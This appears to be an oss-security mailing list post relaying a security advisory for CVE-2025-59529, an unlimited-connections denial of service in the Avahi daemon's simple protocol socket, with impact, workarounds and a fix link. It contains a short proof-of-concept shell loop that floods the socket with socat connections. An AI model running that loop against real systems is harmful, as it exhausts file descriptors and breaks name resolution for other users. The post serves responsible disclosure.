Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <331a43cb-5e71-4ab7-8ee6-29e16c7a75ea@oracle.com>
Date: Fri, 19 Dec 2025 11:55:13 -0800
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: Avahi simple protocol server accepts unlimited
 connections [CVE-2025-59529]

https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q advises:

> Summary
> -------
> 
> The simple protocol server ignores the documented client limit and
> accepts unlimited connections, allowing for easy local DoS.
> 
> Details
> -------
> 
> Although CLIENTS_MAX is defined, server_work() unconditionally
> accept()s and client_new() always appends the new client and
> increments n_clients. There is no check against the limit.
> 
> When client cannot be accepted as a result of maximal socket number of
> avahi-daemon, it logs unconditionally error per each connection.
> 
> PoC
> ---
> 
> # Flood the UNIX simple-protocol socket with idle connections
> for i in $(seq 1 4000); do
>   socat - UNIX-CONNECT:/run/avahi-daemon/socket >/dev/null 2>&1 &
> done
> wait
> 
> Watch avahi-daemon’s memory/FD count grow until it becomes unresponsive or
> crashes, such as an endless loop of:
> 
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> accept(): Too many open files
> 
> Impact
> ------
> 
> Unprivileged local users can exhaust daemon memory and file descriptors,
> causing a denial of service system-wide for mDNS/DNS-SD.
> 
> Exahusting local file descriptors causes increased system load caused
> by logging errors of each of request.
> 
> Overloading prevents glibc calls using nss-mdns plugins to resolve
> *.local. names and link-local addresses.
> 
> Workarounds
> -----------
> 
> Simple clients are offered for nss-mdns package functionality. It is
> not possible to disable the unix socket /run/avahi-daemon/socket, but
> resolution requests received via DBus are not affected directly. Tools
> avahi-resolve, avahi-resolve-address and avahi-resolve-host-name are
> not affected, they use DBus interface.
> 
> It is possible to change permissions of unix socket after avahi-daemon
> is started. But avahi-daemon does not provide any configuration for it.
> Additional access restrictions like SELinux can also prevent unwanted
> tools to access the socket and keep resolution working for trusted users.
> 
> Fixes
> -----
> 
>     Candidate only: https://github.com/avahi/avahi/pull/808
> 
> Credits
> -------
> 
> We would like to thank Joshua Rogers using the ZeroPath tool for
> discovering and reporting the issue responsibly.
> 
>     published article about it: Avahi Simple Protocol Server DoS (CVE-2025-59529)
>     https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529
> 
> Severity: Moderate, 5.5 / 10
>           CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
> CVE ID: CVE-2025-59529
> Weaknesses: CWE-400


-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.